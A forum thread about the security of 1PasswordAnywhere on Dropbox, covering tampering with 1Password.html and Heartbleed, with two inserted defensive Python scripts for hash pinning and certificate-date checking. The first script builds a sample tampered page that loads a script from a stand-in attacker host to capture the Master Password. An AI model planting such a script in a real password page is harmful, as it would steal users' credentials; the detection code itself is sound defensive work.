Dropbox 1PasswordAnywhere secure?
New user, I hope you'll forgive what is probably a silly question: does use of 1PasswordAnywhere on my home and office computers (neither is "public") seriously lessen the security of my passwords? Or should I feel reasonably confident that interacting with that DropBox file is not leaving my data exposed? I have the iOS version of 1Password, and would like to be able to read/use my passwords on other machines.
Comments
-
Hi @nopenotme,
Good question! First of all, 1PasswordAnywhere uses the very same data file that 1Password itself uses, so it has the same security in that respect. When using 1PasswordAnywhere, your encrypted data is not stored on disk unencrypted at any point. For all intents and purposes it is exactly as secure as using the main 1Password application. Also, all encryption/decryption of your data is done locally in your browser using JavaScript.
If you have any more specific questions about this, please let us know! :)
0 -
As @JasperP has correctly pointed out, it is all the same data, encrypted all the same way, with all of the same security properties.
As you probably know, there are rarely simple answers to security questions. So here is where it gets complicated:
However, there is one risk unique to 1PasswordAnywhere, which does not apply to other cases. If an attacker is capable of breaking into your Dropbox account and changes the contents of the 1Password.html file, she can modify it so that it records and sends off your Master Password.
When you use the 1Password application itself, there are numerous checks to ensure that the software you are running hasn't been tampered with. Those checks depend on things checked by your operating system. But when you are loading cryptographic tools into your browser from a website (in this case your page on Dropbox), you have to trust that those tools haven't been tampered with.
So, if you worry that someone might be able to tamper with your 1Password.html file on Dropbox, you should carry those worries over to 1PasswordAnywhere. If, on the other hand, you are sufficiently confident that nobody has compromised your Dropbox account and tampered with your data there, then you should continue to feel comfortable using 1PasswordAnywhere.
0 -
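The risk described in the previous reply (a modified 1Password.html that captures the Master Password) is one the browser cannot detect for you, because nothing signs the page. The check below is an added example, not code from AgileBits or from the thread: it assumes the user has recorded the SHA-256 of a copy of 1Password.html they trust (a pinned hash taken from a freshly installed 1Password, before it was synced to Dropbox) and verifies a newly downloaded copy against it. It also lists every remote src/href/action reference in the page, since a tool that decrypts entirely in the browser has no reason to contact another host. The HTML strings and the `attacker.example` hostname are constructed for the example.

```python
"""Pin-and-verify check for a downloaded copy of 1Password.html.

Added example, not AgileBits code. Assumes the user pinned the SHA-256 of a
trusted copy earlier; the sample pages below are constructed stand-ins.
"""
import hashlib
import hmac
import re

# Minimal constructed stand-in for a trusted 1Password.html: everything local.
TRUSTED_HTML = """<!DOCTYPE html>
<html><head><title>1PasswordAnywhere</title>
<script>
// decryption runs entirely in the page; no network destinations
function unlock(masterPassword) { return decryptLocally(masterPassword); }
</script></head><body><form id="unlock" onsubmit="return false;">
<input type="password" id="mp"></form></body></html>
"""

# The same page with one remote script tag added: a constructed illustration of
# the kind of modification the thread warns about, not a real payload.
TAMPERED_HTML = TRUSTED_HTML.replace(
    "</head>",
    '<script src="https://attacker.example/collect.js"></script></head>',
)

# Attributes that cause the browser to fetch from, or submit to, another host.
_REMOTE_REF = re.compile(
    r'\b(?:src|href|action)\s*=\s*["\']?\s*((?:https?:)?//[^"\'\s>]+)',
    re.IGNORECASE,
)


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the raw file bytes (this is what gets pinned)."""
    return hashlib.sha256(data).hexdigest()


def remote_references(html: str) -> list:
    """Every absolute or protocol-relative URL the page would load or post to.

    1PasswordAnywhere is supposed to do all decryption locally, so any
    remote reference is worth a look even if the hash check is skipped.
    """
    return sorted(set(_REMOTE_REF.findall(html)))


def check_1password_html(data: bytes, pinned_sha256: str) -> dict:
    """Verify a freshly downloaded copy before opening it in a browser.

    Returns both checks so the caller can show why a copy was rejected.
    A hash mismatch is expected right after a legitimate 1Password update
    (the app rewrites 1Password.html); re-pin from a trusted install then.
    """
    actual = sha256_hex(data)
    hash_ok = hmac.compare_digest(actual, pinned_sha256.lower())
    refs = remote_references(data.decode("utf-8", errors="replace"))
    return {
        "sha256": actual,
        "hash_matches": hash_ok,
        "remote_references": refs,
        "safe_to_open": hash_ok and not refs,
    }


if __name__ == "__main__":
    pinned = sha256_hex(TRUSTED_HTML.encode())
    for label, page in (("trusted", TRUSTED_HTML), ("tampered", TAMPERED_HTML)):
        print(label, check_1password_html(page.encode(), pinned))
```

Two caveats a practitioner should keep in mind: the check only covers the copy you verified, so download the file with a script, verify it, and open that local copy rather than re-fetching it through the Dropbox web interface; and the pin itself must come from somewhere an attacker with Dropbox access cannot reach, such as the file inside the 1Password application bundle on a machine you control.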
That helps a great deal. Thanks.
0 -
On behalf of @JasperP and @jpgoldberg, you are quite welcome!
Looking forward to replying to your other posts momentarily. :)
0 -
The possibility of someone tampering with the 1Password.html file is really good to know about. That changes the way I think about one of my practices. You guys think of everything. Thanks for the explanation, @jpgoldberg.
0 -
You are very welcome, @ethansisson!
I don't know about "think of everything", but we do pay attention to where attacks may come from and to the cryptographic and security literature.
0 -
Great thread. Do developments like Goto Fail and Heartbleed raise additional concerns?
0 -
Great thread. Do developments like Goto Fail and Heartbleed raise additional concerns?
Yes.
From the blog (http://blog.agilebits.com/2014/04/08/imagine-no-ssl-encryption-its-scary-if-you-try/)
The one place where 1Password depends on the security of SSL/TLS is for 1PasswordAnywhere. If an attacker can control that connection, they could substitute in a malicious copy of the 1password.html file. However, at latest check, Dropbox does not appear to be affected by the Heartbleed bug, so this particular issue with SSL/TLS security is not a worry for those using 1PasswordAnywhere. However, Dropbox is reported to have been vulnerable earlier, so until Dropbox has a new certificate in place, we advise people to avoid using 1PasswordAnywhere.
0 -
I guess the point here is that there are (or were) two ways to tamper with 1Password.html—on the dropbox.com servers or in transit.
0 -
Dropbox was early to update OpenSSL (it was patched before I tested Tuesday morning, and I'm only going on other reports that it had been vulnerable).
I don't know if they are attempting to get and install new certificates or whether they will be advising people to change passwords.
0 -
Here's what I have not seen in the reporting:
Do not log on to any sensitive website until you receive assurance either
- that the site never had the Heartbleed vulnerability – or –
- that the site has been patched and secured via a new certificate issued using a new keypair.
Why am I not seeing this warning? Is it because my understanding of the threat is wrong (Schneier says that "the probability is close to one that every target has had its private keys extracted by multiple intelligence agencies"), or is it because the advice is sound but the consequences of giving it are too horrific to contemplate?
0
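The second condition in the post above (a new certificate issued after the patch) is something a user can check from the certificate's notBefore date. The script below is an added example for this thread, not code from AgileBits or Dropbox: it compares a certificate's issuance date with the Heartbleed public disclosure date (7 April 2014) and includes a live lookup helper built on Python's ssl module. The certificate dictionaries are constructed in the format that `ssl.SSLSocket.getpeercert()` returns; the serial numbers and dates in them are made up for the example.

```python
"""Was this TLS certificate issued after a given cutoff (here, Heartbleed)?

Added example; not AgileBits or Dropbox code. Sample certificates are
constructed in the dict layout returned by ssl.getpeercert().
"""
import socket
import ssl

# Public disclosure of CVE-2014-0160, as a UTC timestamp.
HEARTBLEED_DISCLOSED = ssl.cert_time_to_seconds("Apr  7 00:00:00 2014 GMT")

# Constructed samples: same hostname, one issued before and one after the cutoff.
OLD_CERT = {
    "subject": ((("commonName", "www.dropbox.com"),),),
    "notBefore": "Jan 15 00:00:00 2014 GMT",
    "notAfter": "Jan 15 23:59:59 2016 GMT",
    "serialNumber": "0A1B",  # made up
}
NEW_CERT = {
    "subject": ((("commonName", "www.dropbox.com"),),),
    "notBefore": "Apr  9 00:00:00 2014 GMT",
    "notAfter": "Apr  9 23:59:59 2016 GMT",
    "serialNumber": "0C2D",  # made up
}


def common_name(cert: dict) -> str:
    """Pull the subject CN out of getpeercert()'s nested tuple layout."""
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return value
    return ""


def issued_after(cert: dict, cutoff_seconds: float) -> bool:
    """True when notBefore is at or after the cutoff."""
    return ssl.cert_time_to_seconds(cert["notBefore"]) >= cutoff_seconds


def assess(cert: dict, cutoff_seconds: float = HEARTBLEED_DISCLOSED) -> dict:
    """Structured verdict for one certificate.

    A post-cutoff notBefore is necessary but not sufficient: a CA can reissue
    a certificate for the old public key, which this date check cannot see.
    Confirming a new keypair means comparing the SubjectPublicKeyInfo (or its
    fingerprint) against the one observed before the patch.
    """
    issued = ssl.cert_time_to_seconds(cert["notBefore"])
    return {
        "host": common_name(cert),
        "serial": cert.get("serialNumber", ""),
        "issued_after_cutoff": issued >= cutoff_seconds,
        "days_after_cutoff": (issued - cutoff_seconds) / 86400.0,
    }


def fetch_peer_cert(hostname: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Live lookup of a server's leaf certificate (needs network access)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    for cert in (OLD_CERT, NEW_CERT):
        print(assess(cert))
    # To check a real site: print(assess(fetch_peer_cert("www.dropbox.com")))
```

Because the key-reuse case is invisible to a date check, the practical procedure is to record the certificate fingerprint (or the public key) you saw before the patch and compare it with what the server presents afterwards; the date check alone only rules out the obvious failure of a site that patched OpenSSL and kept its pre-Heartbleed certificate.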